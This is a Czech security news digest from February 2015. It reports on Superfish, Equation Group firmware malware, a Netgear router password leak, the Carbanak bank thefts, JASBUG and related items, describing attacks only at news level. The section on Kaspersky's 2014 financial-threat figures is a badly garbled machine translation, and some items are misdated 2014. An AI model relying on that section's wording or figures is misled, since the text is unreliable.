„Ve svém týmu mám nyní řadu inženýrů, kteří si připadají opravdu trapně,“ uvedl včera v rozhovoru CTO Lenova Peter Hortensius. „Toto opravdu nezvládli.“ Problém se týká aplikace s názvem Superfish, kterou Lenovo instalovalo na své laptopy od září minulého roku. Ta totiž nejenže vkládá produktová doporučení do výsledků hledání, ale je pro uživatele také závažným bezpečnostním rizikem.

Program si totiž „pohrává“ se šifrovaným webovým trafikem, když ukládá své vlastní SSL certifikáty do oblasti ve Windows, která je využívána k ukládání SSL certifikátů webovými prohlížeči a dalšími aplikacemi. Podle bezpečnostních expertů pak útočníci mohou - jakmile se uživatel připojí k veřejné Wi-Fi nebo síti ovládané hackery - poměrně jednoduše získat k certifikátu klíč. O tomto útoku jako první informoval Robert Graham ze společnosti Errata Security.

Jak uvedl Hortensius, fakt, že uživatelé jsou díky Superfish vystaveni možnému útoku, je neakceptovatelný a Lenovo si rizika až do jejího zveřejnění nebylo vědomo. Čínská společnost tak nyní „pracuje na nápravě“. Lenovo již zveřejnilo pro uživatele instrukce, pomocí kterých mohou Superfish odstranit a brzy vydá speciální nástroj, který program odinstaluje a smaže jím vytvořené certifikáty. Tento nástroj by mohl být vydán již dnes.

Lenovo také zkoumá, zda by nástroj nebylo možné vydat jako automatický patch ve spolupráci s jeho partnery jako Microsoft a McAfee. Jak dodal Hortensius, Lenovo také zavede mechanismy, které mají zajistit, aby se podobná chyba již nikdy neopakovala.

„Chceme detailněji prověřit všechny programy, které jsou předinstalovány na našich systémech a nedopustíme, aby se tyto dostaly k uživatelům, pokud si budeme jen z části myslet, že by mohly být závadné,“ dodal Hortensius. V mezidobí Lenovo řeší možnostih nápravy problému způsobeného Superfish s výrobci prohlížečů a antivirů.

Výrobci prohlížečů nejspíše umístí certifikáty vytvořené Superfish na své blacklisty. Problém je však v tom, že existují jiné programy využívající šifrování - například VPN klienti - které využívají knihovnu Windows k ověření pravosti certifikátů. Ty tak mohou být také náchylné k útoku, pokud certifikáty Superfish nebudou ze systému zcela odstraněny.

„Nezbývá, než říci, že toto jsme opravdu nezvládli. Nesnažíme se to skrývat. Snažíme se udělat všechno, co je v našich silách, k vyřešení tohoto problému,“ dodal Hortensius s tím, že Superfish byl předinstalován pouze na některých laptopech, které se v obchodech objevily mezi zářím a lednem. Společnost přestala aplikaci na své počítače instalovat poté, co si na něj stěžovala řada uživatelů.


Nový virus je schovaný přímo v pevných discích. Pomůže jen rozbití
18. února 2015 Viry
Společnost Kaspersky objevila, že na firmware pevných disků většiny výrobců útočí virus, který umožní sledovat dění na počítači. Běžnými prostředky se jej přitom nelze zbavit. Firma naznačuje, že za ním stojí vládní úřady, patrně nechvalně proslulá špionážní agentura NSA.
Pouštní Falcons cílených útoků

Cíle skupiny označované jako Equation Group
Cíle skupiny označované jako Equation Group, která stojí i za novým virem | foto: Kaspersky
Společnosti Kaspersky přinesla rozsáhlou zprávu o skupině, která šířila virus (pdf od 10. kapitoly, anglicky), který je specifický svým chováním. Dokáže totiž napadnout firmware, tedy software, který ovládá pevný disk (HDD) a je jeho součástí. Jestliže se dostane do počítače má za úkol přeprogramovat firmware HDD, doplnit ho o vlastní kód a umožnit vytvoření skrytých sektorů na tomto disku.

Podle firmy je to možné pouze tak, že tvůrce viru měl tento firmware k dispozici. Buď jej v případě vládní agentury získal přímo od výrobce, nebo se k němu dostal pokoutným způsobem, třeba prostřednictvím napadení systémů výrobců disků a/nebo jejich zaměstnanců.

Firma Western Digital oslovená agenturou Reuters přitom takovou spolupráci odmítla. „Neposkytujeme zdrojové kódy vládním agenturám,“ uvedl mluvčí společnosti Steve Shattuck. Mluvčí firmy Seagate Clive Over zase tvrdí, že přijali bezpečnostní opatření, která mají zabránit manipulaci s kódem a jeho reverznímu inženýrství, tady zpětnému odkrytí kódu. I tak se může vládní agentura ke kódu dostat, pokud třeba simuluje softwarové vývojáře nebo jej získá v rámci bezpečnostní prověrky kódu.

Virus se přitom nevyhýbá žádnému z velkých výrobců hardwaru. Kaspersky tak odhalil u tohoto závadného softwaru záznamy o discích firem Corsair, Hitachi, IBM, Micron, Samsung Electronics, OCZ, Seagate Technology, Toshiba, Western Digital Technologies a dalších.

Takto ukrytý virus je odolný proti všem běžně využívaným bezpečnostním programům. I když si uživatel disk zformátuje a přeinstaluje, stále v něm zůstává a může si vytvářet skryté oddíly, kam nahrává zachycené údaje. Vedle toho může na počítač instalovat další závadné programy, které mohou sloužit k zachytávání komunikace a dalších aktivit na počítači. V podstatě jedinou jistou cestou, jak se jej zbavit, je disk přestat používat a případně jej zničit. Zda pomůže přepsání firmwaru, není jisté.

Inženýři z firmy Kaspersky však uvádějí, že reálně narazili jen na velice málo takto napadených disků, z čehož odvozují, že si tento virus útočníci nechávají jen pro velice důležité cíle.

Za vším hledej NSA
I když Kaspersky konkrétně neuvádí, kdo za virem stojí, ve své zprávě naznačuje, že virus má podobné vlastnosti jako americko-izraelský virus Stuxnet, který byl podle dostupných informací vyvinout americkými tajnými službami za účelem sabotáže íránského nukleárního programu (více v článku o viru, který napadl i vesmírnou stanici ISS).

Podle Kaspersky za novým virem stojí skupina, kterou označuje jako Equation Group. Ta má operovat minimálně od roku 2001, ale její stopy mohou vést až do poloviny devadesátých let minulého století. Její operace směřují především do oblastí, jako jsou Írán, Rusko, Pákistán, Afghánistán, Indie, Čína, ale nevyhýbají se ani evropským státům, jako je například Británie.

Jak funguje Regin
Složitost viru Regin ve schématu firmy Symantec ukazuje jeho pětistupňovou strukturu.
Regin je vícestupňový virus, kde je každý stupeň s výjimkou prvního skrytý a zašifrovaný. Spuštěním první vrstvy se nastartuje řetězec dešifrování a nahrávání každé další fáze v rámci pěti etap. Každý jednotlivý stupeň přitom poskytuje jen velmi málo informací o kompletním balíčku. Přitom jen získáním obsahu všech pěti fází je podmíněna analýza, která umožní pochopit celou hrozbu.

Skupina používá různé prostředky k šíření dalších špionážních prográmků, jako je mezi počítačovými útočníky oblíbené napadení webových stránek, šíření zavirovaných USB pamětí a optických disků.

Stojí za mnohými typy sofistikovaných škodlivých prográmků, jako je například Regin, který vyvolal údiv svou komplexností. Stejně jako tyto viry si i novinka vybírá své oběti a zpravidla se nenahraje do systémů, které nejsou v oblasti zájmu jejího tvůrce.

I proto padá podezření na americkou špionážní agenturu NSA. Agentuře Reuters se pro tento předpoklad dokonce podařilo nepřímé důkazy. Bývalý zaměstnanec NSA, jehož identita samozřejmě nebyla zveřejněna, agentuře sdělil, že analýza společnosti Kaspersky je správná a že si lidé ve zpravodajské agentuře cení tento sledovací program stejně vysoko jako Stuxnet. Další bývalý zpravodajský operativec pro agenturu také tvrdil, že techniku ukrývání spywaru v pevných discích vyvinula právě NSA. Mluvčí NSA tyto informace nijak nekomentovala.


Routery Netgearu vyzradí heslo administrátora

17.2.2015  Zranitelnosti

Pokud používáte routery Netgear WNDR3700v4 (V1.0.0.4SH nebo V1.0.1.52), WNR2200 (V1.0.1.88) nebo Netgear WNR2500 (V1.0.0.24), měli byste zbystřit. V podezření jsou i NetGear WNDR3800, Netgear WNDRMAC, NetGear WPN824N a NetGear WNDR4700.

Peter Adkins našel způsob, jak z těchto routerů získat heslo administrátora nebo informace o WiFi připojení. Stačí být připojený v síti, nebo pokud má router povolenou správu přes WAN, stačí znát jeho IP adresu.

Zranitelnost spočívá ve službě SOAP využívané pro komunikaci s aplikací NetGear Genie. V základu je tato služba filtrovaná, ale upravený HTTP požadavek to jednoduše obejde.

V domácí síti to asi nebude představovat tak závažný problém, ale u WiFi sítí ve veřejných prostorech tak mohou klienti změnit nastavení WiFi sítě. Pokud někdo používá administraci přes WAN (ve výchozím nastavení vypnutou), je velmi vážně ohrožen.

Adkins na chybu Netgear upozornil, jeho dosavadní reakce ale tuto chybu neberou jako závažnou. Nahlášenou chybu Netgear uzavřel jako nevyžadující zásah.


Hackeři ukradli z bank včetně českých desítky miliard korun

17.2.2015 Incidenty
Skupina hackerů ukradla během dvou let z finančních institucí v nejméně 25 zemích světa včetně těch v České republice až miliardu dolarů, tvrdí experti Kaspersky Lab.

Kaspersky Lab o skupině hackerů informoval v neděli s tím, že kompletní zprávu vydá dnes. Hackeři údajně používali velmi sofistikovaný systém, když pronikli hluboko do bankovních počítačových sítí a sledovali zaměstnance při jejich každodenních činnostech. V některých případech se útočníci naučili převádět bezhotovostně peníze pouze tím, že sledovali počítače pracovníků přes video.

„Díky tomu, že hackeři věděli, jakým způsobem zaměstnanci pracují, byli schopni realizovat převody, aniž by si jich někdo všimnul,“ uvedl Kaspersky. Skupina, jíž Kaspersky přezdívá jako "Carbanak", od roku 2013 pronikla do systémů v až stovce finančních institucí v téměř třiceti zemích světa. Členové gangu pocházeli především z Ruska, Ukrajiny a Číny.

Napadeny byly finanční instituce v Austrálii, Brazílii, Bulharsku, Kanadě, Číně, České republice, Francii, Německu, Hong-Kongu, Indii, Irsku, Maroku, Nepálu, Norsku, Polsku, Pákistánu, Rumunsku, Rusku, Španělsku, Švýcarsku, Velké Británii, Thajsku, USA, na Ukrajině a Tchaj-wanu. Kaspersky žádnou konkrétní instituci nejmenoval, jelikož Interpol a Europol případ stále vyšetřují.

Každý útok trval dva až čtyři měsíce, přičemž počítače uvnitř bank byly infikovány červy pomocí phishingových útokům, v rámci kterých byl vybraným zaměstnancům zaslán e-mail obsahující škodlivý kód.

Podle zjištění Kaspersky útočníci naráz ukradli až deset milionů dolarů - peníze byly převáděny na účty členů gangu v USA a Číně. Hackeři měli poměrně propracovaný systém, díky kterému nebyli doposud dopadeni.

V řadě případů uměle navyšovali zůstatky na účtech jednotlivých zákazníků a následně z nich peníze vybírali tak, aby bankovní bezpečnostní systémy nic nezaznamenaly. Kromě bezhotovostních převodů hackeři v několika případech ovládli také bankomaty, kterým v určitou denní dobu zaslali povel k vydání všech peněz.

Postupy odcizení peněz:
1) Když přišel čas zpeněžit aktivity, využili podvodníci online bankovnictví nebo mezinárodní online platební systémy k převodu peněz z účtů v bance na jejich vlastní účty. Tyto peníze byly následně vybrány v bankách v Číně nebo Americe. Analytici nevylučují možnost, že k tomu byly využity i banky v jiných zemích.
2) V dalších případech pronikli kybernetičtí zločinci do samotného srdce systémů účtů, pozměnili zůstatky a zbytek peněz převedli podvodnými transakcemi na své účty. Například když bylo na účtu tisíc dolarů, změnili jeho hodnotu na deset tisíc dolarů a devět tisíc si převedli k sobě. Oběť dlouho nic netušila, protože zůstatek byl stále původních tisíc dolarů.
3) Kybernetičtí zločinci také získali kontrolu nad bankomaty a zadali jim, aby vydaly hotovost v určený čas, kdy jeden člen gangu k přístroji přišel a vydané peníze převzal.


Sledovali každý pohyb bankéřů i v Česku. Velká bankovní loupež vynesla hackerům miliardy

16.2.2015 Kriminalita
Na konci roku 2013 začal ze sebe bankomat v Kyjevě chrlit jednu bankovku za druhou. Nikdo do něj ale nedal kartu ani se ho jinak nedotkl. Na první pohled se mohlo zdát, že jde o chybu, díky které si mohli náhodní kolemjdoucí doslova narvat kapsy penězi k prasknutí. Vyšetřování však ukázalo, že jde o jednu z největších bankovních loupeží v historii, za kterou stojí hackeři. Operovali údajně i v Česku.
Jak dlouho hackeři na bankovních institucích parazitovali, zatím bezpečnostní experti neprozradili.
Na vyšetřování nestandardního chování bankovního systému byli tehdy přizváni bezpečnostní experti z antivirové společnosti Kaspersky Lab. Jak ale konstatovali krátce po příjezdu na Ukrajinu, údajná chyba bankomatu byla jedním z nejmenších problémů dotyčné banky, uvedl internetový server deníku The New York Times.

Vnitřní počítače banky, které používají její zaměstnanci zpracovávající denní transfery a účetnictví, totiž byly infikovány sofistikovaným malwarem. Šlo o tzv. keylogger, tedy počítačový program schopný zaznamenávat každý stisk klávesy a dokonce i videozáznamy toho, co se zrovna děje na obrazovce. Všechna tato data pak malware odesílal zpět hackerům.

Pracovali stejně jako zaměstnanci banky
Zločinecké skupiny tak měly perfektní přehled o každodenní rutině drtivé většiny klíčových zaměstnanců. Zároveň ale také hackeři měli dokonalou znalost jejich přístupových údajů. Nezvaného návštěvníka totiž v napadených strojích takto nechali sbírat data několik měsíců.

Když měli vše potřebné, přišel zvrat. Začali systematicky okrádat banky dolar po dolaru. Postupovali přitom tak opatrně, že ani pravidelné vnitřní kontroly banky neodhalily, že je něco špatně. Jednoduše to vypadalo, že „práci“ s penězi skutečně vykonávají zaměstnanci banky. Takto si jednoduše počítačoví piráti posílali finance na své vlastní účty.

„Je to pravděpodobně nejvíce sofistikovaný útok, s jakým jsme se kdy setkali,“ řekl Chris Doggett z americké pobočky Kaspersky Lab.

Postiženo sto bank ve 30 zemích
Jak dlouho takovýmto způsobem na bankovních institucích parazitovali, zatím bezpečnostní experti z Kaspersky Lab neprozradili. Podle nich se však útoky se stejným scénářem objevily ve 30 různých zemích a napadeno bylo více než 100 bank a dalších finančních institucí.

Údajně mezi nimi mají být také finanční domy v Česku. Jakých konkrétních tuzemských firem se útok týkal, však bezpečnostní experti zatím neuvedli.

Do vyšetřování se již zapojil také americký Federální úřad pro vyšetřování (FBI). Přestože se podařilo odhalit systém, jakým hackeři pracovali, bude podle zástupců úřadu trvat daleko déle, než bude možné přesně vyčíslit ztráty.

Ukradli možná až miliardu dolarů
Zástupci Kaspersky Lab však serveru deníku The New York Times prozradili, že mají k dispozici důkazy o krádežích ve výši 300 miliónů dolarů (7,2 miliardy korun). Jedním dechem však dodávají, že celkové škody mohou být až třikrát vyšší – mohou tedy dosahovat až jedné miliardy dolarů.

Jen těžko se dá předpokládat, že za takto rozsáhlou operací by stál jednotlivec. Spíše jde o rozsáhlou skupinu hackerů, kteří podobným způsobem operovali v Rusku, Japonsku, Spojených státech, ale i v Evropě.

Zda mají vyšetřovatelé nějaké stopy, které by je ke gangu a odcizeným miliardám dovedli, zatím není jasné.


Hrozby Finanční kybernetické v roce 2014: věci změnily
16.2.2015 Zdroj:Kaspersky Analýza

V roce 2013 jsme provedli náš první hloubkový výzkum v oblasti finančního cyber-hrozeb. V té době jsme zaznamenali náhlý nárůst počtu útoků na finanční informace uživatelů a peníze. Finanční kybernetickým hrozbám krajina byla podrobně popsány ve společnosti Kaspersky Lab "Finanční Cyber-hrozeb v roce 2013," zprávě .

V roce 2014 se situace výrazně změnila: počet útoků a napadl uživatelé výrazně poklesl, stejně jako výše finančního phishing. Klíčová zjištění studie do finančního krajiny cyber-hrozeb v roce 2014 jsou následující:

ksn_2014_1

Útoky se finančního malwaru v letech 2013 a 2014

Finanční útoky phishing

V roce 2014 finanční phishingových útoků, k nimž patří phishing, který se zaměřuje Banky, platebních systémů a e-shopy, tvořily 28,73% všech phishingových útoků (pokles o 2,72 procentního bodu).
Phishing Bank v souvislosti s tvořily 16,27% všech útoků.
Množství phishingu proti platebním styku zvýšil 2,4 pb (z 2,74% v roce 2013 - 5,14% v roce 2014)
Finanční útoky malware

V roce 2014 produkty Kaspersky Lab zjištěn 22900000 útoky zasahující finanční malware na 2,7 milionu uživatelů. To představuje meziroční pokles o 19,23% na 29,77% a útoky uživatelů.
Z celkového počtu uživatelů vystavených všech typech útoky škodlivého softwaru, 4,86% uživatelů narazil útoky zasahující nějaký finanční hrozby - to je 1,34 procentního bodu méně než v roce 2013.
Výše bankovní malware vzrostl 8,89 procentního bodu na 75,63% všech finančních malware útoků v roce 2014.
Počet útoků zahrnujících Bitcoin mining malware ztrojnásobil: z 360.065 útoky v roce 2013 na 1.204.987 v roce 2014
Existuje několik možných důvodů těchto změn. Za prvé, donucovacích orgánů po celém světě aktivně stíhán zločinci, kteří se šíří finanční malware a phishing. Zejména, loni v létě, donucovacími orgány v USA a ve Velké Británii se zastavil činnost dvou nebezpečných škodlivých kampaní - GameOver / Dia a Shylock .

Druhým důvodem poklesu počtu útoků může být posun v zaměření Počítačoví zločinci "- namísto útočení koncové uživatele jsou nyní sledují organizace, které pracují s finančními informacemi a platební nástroje. V průběhu roku byly časté zprávy o zákeřných útoků na velkých prodejnách, hotelových řetězců a rychlého občerstvení, které slouží miliony zákazníků denně. V každém případě, že podvodníci používají škodlivý software, který by mohl ukrást data, bankovní karty přímo z paměti POS terminály používané organizacemi pod útokem. Banky se stal ještě jeden "nový" cybercriminal cíl. V roce 2014, Kaspersky Lab zkoumali několik útoky na banky, spíše než účty svých uživatelů. Ani jeden z těchto "nových" typů útoku vyvolala vlnu nových AV detekcí jednoduše proto, že je tak málo organizací zapojených v porovnání s počtem soukromých uživatelů běží antivirová řešení, takže je obtížné srovnávat počet útoků. Nicméně, takové útoky dosáhly milionů dolarů, aby této hrozbě lze jen stěží odmítnout.

#Cybercriminals Mají menší zájem o "hmotě" nebezpečné útoky, raději méně, více "cílená" #attacks #KLreport
Tweet
Třetí možný důvod pro snížení počtu kybernetických útoků spočívá v obecném trendu pozorovaného odborníky společnosti Kaspersky Lab v roce 2014. Podle odborníků společnosti, zločinci mají menší zájem o "hmotě" zlomyslné útoky na uživatele, raději méně, více "cílených útoků" , To je znázorněno na zvýšené hladiny cíleného phishingu: podvodníci jít jen po určitou skupinu uživatelů (například on-line uživatelů bankovnictví), spíše než šíření hromadnou korespondenci s nebezpečnými odkazy.

Tato taktika naznačuje, že selektivní škodlivý mailing je méně pravděpodobné, že budou zjištěny specialisty IT bezpečnosti a životnosti nebezpečné odkazy a vzorků malwaru bude prodloužena. Vtip je v tom není vždy úspěšný, ale jedním z důsledků jeho použití je pokles absolutního počtu registrovaných kybernetickými útoky.

Android finanční útoky škodlivého softwaru

A co o mobilních finančních ohrožení?

Za prvé, když mluvíme o mobilních hrozbách jsme se zaměřili na hrozbách Android. Podle odborníků Kaspersky Lab, více než 99% mobilního malwaru, že jsou si vědomi je navržen tak, aby napadnout zařízení Android.

48.15% útoků proti #Android uživatelů cílení využívány malware finanční údaje (Trojan-SMS, Trojan, Banker)
Tweet
V roce 2014 Kaspersky Lab a Interpolem, vydala společnou studii na mobilní hrozbách, které - mimo jiné - na které se vztahuje finanční malware cílování uživatele systému Android. Podle zjištění došlo 3.408.112 útoky proti 1.023.202 uživatelů zaznamenaných v období od 01.08.2013 do 31. července 2014. O 500.000 uživatelé narazili Android malware navržen tak, aby ukrást peníze alespoň jednou. Více než půl roku uplynulo od konce období, na které se vztahuje Kaspersky Lab / Interpolu studie, a tady je to, jak se věci změnily od:

48.15% útoků proti uživatelům zařízení se systémem Android blokovaných Kaspersky Lab produktů využívaných malware cílování finanční údaje (Trojan, SMS a Trojan, bankéř)
Ve srovnání s rokem 2013 se počet finančních útoků proti uživatele Android vzrostla 3,25 krát (od 711.993 do 2.317.194 útoků) a počet napadených uživatelů se zvýšil 3,64 krát (od 212.890 do 775.887 uživatelů)
ksn_2014_2

Útoky proti uživatelům zařízení se systémem Android v letech 2013 a 2014

Jinými slovy, stále rostoucí počet finančních útoků proti uživatelům zařízení se systémem Android je silný trend, který nevykazuje žádné známky klesající.


Kritickou chybu ve Windows má Microsoft, ohrožené miliony strojů

13.2.2014 Zranitelnosti
Microsoft vydal v úterý kritickou záplatu pro Windows, která opravuje nebezpečnou zranitelnost, díky níž útočníci mohli převzít na dálku plnou kontrolu nad systémy nic netušících uživatelů. Oprava pro Windows Server 2003 však vydaná nebude.

Vývoj a testování aktualizace pro chybu přezdívanou jako JASBUG, trval více než rok a byla díky ní zpřísněna mimo jiné i Skupinová politika (Group Policy), což je funkce, která umožňuje organizacím centrálně spravovat systémy s Windows.

Díra byla podle bezpečnostní konzultantské společnosti JAS Global Advisors ukryta přímo ve Skupinové politice po více než deset let. JAS Global Advisors spolu se společností simMachines o existenci díry informoval Microsoft v lednu 2014.

„Narozdíl od známých děr jako Heartbleed, Shellshock, Gotofail a POODLE je tato díra obsažena přímo ve struktuře Skupinové politiky,“ uvedl na svých webových stránkách JAS. Aby ji mohl opravit, musel proto Microsoft předělat klíčové komponenty svého operačního systému a přidat několik nových funkcí.

Microsoft se tomuto bezpečnostnímu riziku věnoval v bulletinu MS15-011. Inženýři amerického gigantu na blogu vysvětlili, že útočníci tyto díry zneužívali za použití technik jako ARP spoofing na lokální síti, díky nimž přiměli počítače akceptovat a aplikovat špatné nastavení Skupinové politiky ze serverů, které měli pod kontrolou.
 

Při úspěšném zneužití díry byli útočníci schopni na dálku na počítače instalovat programy, měnit data nebo vytvářet nové účty. JAS plánuje vydat techničtější podrobnosti o zmíněné díře později v tomto měsíci.

Microsoft ve snaze zabránit útokům přinesl na systémy s aktualizací MS15-011 novou funkci zvanou jako UNC (Universal Naming Convention) Hardened Access. Ta vyžaduje, aby se klient i server autentifikovali před tím, než klient přistoupí k obsahu UNC (jímž jsou například data Skupinové politiky) na serveru.

I když problém postihuje všechny podporované verze Windows, Microsoft se rozhodl, že patch nevydá pro Windows Server 2003, jehož podpora bude ukončena 14. července.

Podle Microsoftu nemělo smysl vytvářet záplatu i pro Windows Server 2003, jelikož by musel být předělán nejen komponent Skupinové politiky, ale i další významné části operačního systému. Kvůli tomu by pak mohly vzniknout problémy s kompatibilitou u aplikací, jež byly navrženy přímo pro Windows Server 2003.

I když toto odůvodnění dává smysl, řada firem používajících Windows Server 2003 až do července i nadále očekává vydávání bezpečnostních aktualizací. Na tomto operačním systému běží po celém světě stále miliony počítačů a analytici předpovídají, že jejich migrace na novější verzi OS bude obtížná, jelikož okolo zastaralého OS firmy postavily celý „ softwarový ekosystém“.


Počet krádeží smartphonů díky funkci „kill switch“ rychle klesá

13.2.2014 Mobil
Krádeže smartphonů jsou na ústupu. Analytici to mimo jiné dávají do souvislosti s uplatněním funkce kill, která znemožní mobilu v cizích rukách další fungování.

Například v Londýně počet krádeží smartphoinů poklesl meziročně o 40 %. V San Franciscu obecně počet krádeží a loupeží klesl v roce 2014 meziročně o 22 %, přičemž přímo počet krádeží a loupeží smartphonů klesl o 27 %. Krádeže iPhonů pak klesly o 40 %.

A konečně v New Yorku počet krádeží smartphonů klesl o 16 %, zatímco u iPhonů to bylo o celých 25 %.

„Tyto velké poklesy počtu krádeží smartphonů jsme zaznamenali od té doby, co je na trhu tzv. kill switch, což je důkazem toho, že naše strategie funguje. Lidé v našich městech se nyní mohou cítit bezpečněji,“ uvedl v prohlášení prokurátor New Yorku Eric Schneiderman. Kill switch je funkce či aplikace v mobilním operačním systému, která umí na dálku z telefonu smazat všechna osobní data a znemožnit jeho další používání.

Vládní představitelé již dlouhou dobu prosazují, aby byla tato technologie standardizována, čímž by se snížil počet krádeží smartphonů na ulicích velkých měst. Očekává se, že telefony nebudou tak častým cílem útočníků, pokud je bude možné jednoduše a rychle "zničit".
 

Třeba Apple přidal kill switch (funkce je nazvána jako Activation Lock) do svého iPhonu v září 2013 a následně se v dubnu 2014 připojil Samsung se svým smartphonem Galaxy S5. Google funkci integroval do Androidu verze Lollipop.

Další rozšíření se čeká i díky tomu, že podle zákonu státu Kalifornie musí být tato funkce kill switch obsažena ve všech smartphonech vyrobených po 1. červenci 2015 a prodávaných v tomto státě. I když se zákon v současné době týká pouze Kalifornie, měl by být inspirací pro další (nejen americké) státy.

Státní zástupce George Gascon, který spolu se Schneidermanem stál za iniciativou na standardizaci funkce kill switch, přijal výsledky nové studie s nadšením a uvedl, že podle jeho očekávání budou krádeže smartphonů i nadále na ústupu.

Výrobci smartphonů prvně byli proti těmto opatřením spíše v opozici, avšak následně změnili svůj pohled. Aktivnější jsou v poslední době také někteří operátoři, kteří přišli s novou politikou, podle které ukradené telefony nelze v sítích znovu aktivovat.


Rizika na sociálních sítích lépe ohlídá novinka Esetu

12.2.2014 Software
Novou verzi svého řešení Social Media Scanner představil Eset. Kromě pokročilých technologii nabízí i přepracované uživatelské rozhraní a řadu nových technologií.

Hlavní funkcí Social Media Scanneru je detekovat škodlivé či podezřelé linky na sociálních sítích a varovat před nimi uživatele. Nová verze obsahuje navíc nově technologie pro kontrolu nastavení účtů na Facebooku a Twitteru, a také možnost souhrnného pohledu na stav účtů na obou těchto sociálních sítích v jediném okně.

Mezi inovacemi je také vylepšená funkce e-mailové notifikace zjištěných škodlivých nebo podezřelých linků.

„Facebook i Twitter mají řadu možností nastavení účtů – a ne všechna rizika, související s jednotlivými volbami v nastavení, jsou uživatelům zřejmá. Social Media Scanner v nové verzi uživatele na tato rizika upozorňuje,“ vysvětluje Martin Skýpala, produktový specialista Esetu.

Produkt je pro uživatele zdarma. K využití některých funkcí je však potřeba registrace, například při přístupu k dalším službám na portálu my.eset.com, ale také
při skenování všech profilů daného uživatele na Facebooku i Twitteru nebo ochraně vícero účtů na téže sociální síti.

Podle dodavatele Social Media Scanner detekuje denně na 30 tisíc škodlivých či podezřelých linků na Facebooku a 10 tisíc na Twitteru.

„Ukazuje se, že na Facebooku mají uživatelé oproti Twitteru trojnásobné riziko, že narazí
na škodlivý či podezřelý link. Facebook je pro internetové podsvětí lákavějším terčem; jednak proto, že má větší počet uživatelů, účty obsahují větší množství potenciálně zneužitelných dat – včetně toho, že některé jsou přímo napojeny na platební karty,“ dodává Mário Turner, produktový manažer Eset Social Media Scanner.


Zajištění bezpečnosti vyžaduje stálé změny – nezapomeňte na tyto

12.2.2014 Bezpečnost
Plán odezvy na bezpečnostní incidenty je potřeba aktualizovat. Žádný plán, zvláště v ochraně dat, totiž není vytesaný do kamene.

Manažeři bezpečnosti vždy vytvářejí k procesům a plánům nějakou dokumentaci. Je to úkol bez reálného konce, protože se musí každou chvíli oprašovat a přemýšlet o možnostech aktualizace příslušných reakcí. Také potřeby organizace se neustále mění a stejně je tomu i u technologií – takže to, co bylo ještě před pár lety skvělým řešením, může mít v současné době už vážné nedostatky.

To byl i případ našeho plánu reakcí na incidenty. Nedávno jsem měl důvod ho zkontrolovat a zjistil jsem, že jednoznačně vyžaduje nějakou modernizaci.

Během let jsem se naučil, že tyto plány není dobré vytvářet úplně od nuly. Když vytváříte bezpečnostní program podle standardu, je pravděpodobnější, že při auditu obstojíte, protože bude mít podobu, která je v rámci oboru známá a akceptovaná.

Základ od expertů

To je důvod, proč jsem se rozhodl jako náš výchozí bod použít doporučení reakcí na incidenty, který vypracovala agentura NIST (National Institute of Standards and Technology). Každá organizace bude samozřejmě chtít svůj plán přizpůsobit pro své vlastní potřeby, ale vybudovat ho na základě široce používané a solidní struktury může být velkou pomocí do začátku.

S využitím doporučení NIST jsme rozdělili náš proces reakcí na bezpečnostní incidenty do čtyř fází: příprava, detekce a analýza, omezení a vymýcení a konečně analýza po incidentu.

Příprava je v mnoha směrech nejdůležitější částí. Zahrnuje určení členů krizového akčního týmu CAT (Crisis Action Team). Kromě zástupců z oblasti zabezpečení informací jsme v týmu CAT chtěli mít také inženýry znalé platforem Windows a Unix, síťové techniky, personál linky technické podpory a také právníky.

Po výběru těchto lidí jsme si sehnali jejich úplné a záložní kontaktní informace, abychom měli jistotu, že se s nimi dokážeme spojit při výskytu nějakého incidentu. Potom jsme určili některé konferenční místnosti, aby sloužily jako velitelská centra, a zabezpečili jsme pro ně vyhrazenou příchozí telefonní linku a e-mailový distribuční seznam.

V této fázi jsme také udělali souhrn všech relevantních nástrojů, které bychom mohli potřebovat k detekci incidentů a reakci na ně včetně zachytávání paketů, analýzy malwaru a systémů pro sledování událostí a také forenzních nástrojů. Nakonec jsme zjistili důvěryhodné třetí strany, kterým bychom mohli zavolat v případě, že bychom potřebovali pomoc nějakého experta.

Nikdy nemůžete vědět, jak se bude bezpečnostní incident vyvíjet. S tím na mysli jsme se ve fázi detekce a analýzy nepokoušeli vyjmenovat všechny možné scénáře. Namísto toho jsme udělali seznam obvyklých událostí, které považujeme za největší hrozby. Patří mezi ně napadení malwarem, phishingové útoky, neautorizovaný přístup, ztráta dat, útoky odepřením služby a krádež.

Akční tým „v akci“

Stanovili jsme také druhy událostí, které by měly vyvolat aktivaci týmu CAT. Například infekce jednoho počítače malwarem pro to nestačí, ale detekce malwaru, který se rychle šíří, už by mohla vyžadovat plnou odezvu týmu CAT. Abychom dokázali zodpovědně rozhodnout o nutnosti povolat naši bezpečnostní kavalerii, vytváříme matici pro záznam kritérií pro eskalaci problémů.

Pro třetí fázi – omezení a vymýcení – vytváříme pokyny k tomu, zda událost vyžaduje shromažďování důkazů, hodnocení škod a identifikaci útočníků. Připravujeme také kontrolní seznamy, jejichž cílem je zajistit řádné vymýcení, případně omezení libovolné škodlivé aktivity incidentu. Kontrolní seznam může například řešit, co dělat, když dojde ke kompromitaci serveru se systémem Windows.

A konečně pro fázi „po incidentu“ popisujeme, jak zajistit shromáždění všech informací, jež jsou potřeba k podání trestního oznámení či jiného správního řízení, a přidáváme doporučení pro následné analýzy, abychom dokázali identifikovat to, co fungovalo dobře, a to, co je třeba zlepšit.

Jakmile bude dokument pro odezvy na incidenty kompletní, zahájíme plánování školení a pravidelně budeme plán i testovat, abychom si udrželi jistotu, že dokážeme efektivně reagovat na jakýkoli incident.


Zaměstnanci s implementovaným čipem? Ve Švédsku už realita

12.2.2014 Bezpečnost
Některým zaměstnancům firem, které využívají švédský high-tech kancelářský komplex ve Stockholmu, byly do jejich rukou implantovány RFID čipy, které jim umožňují přistupovat k bezpečnostním dveřím a celé řadě dalších služeb bez zadávání PINu a používání speciálních karet.

Lidé pracující v budově Epicenter ve Stockholmu mohou díky svým implantátům zaplatit například i za oběd. „To, že si někteří lidé v kancelářích Epicentra zvolili výměnu svých přístupových karet za NFC implantáty, je jejich svobodné rozhodnutí“ uvedl zakladatel švédské asociace Bionyfiken Hannes Sjoblad. „Čipy má zatím malé procento zaměstnanců, ale noví rychle přibývají.“

Podle Sjoblada je ve Stockholmu řada dalších kanceláří, firem, fitness center a vzdělávacích institucí, do nichž mohou lidé díky implantovaným RFID/NFC čipům vstupovat. Implantáty RFID jsou jen o něco větší než zrnko rýže a Sjobladova skupina je testovala v omezeném okruhu uživatelů celý minulý rok, přičemž nyní začala s veřejným testováním.

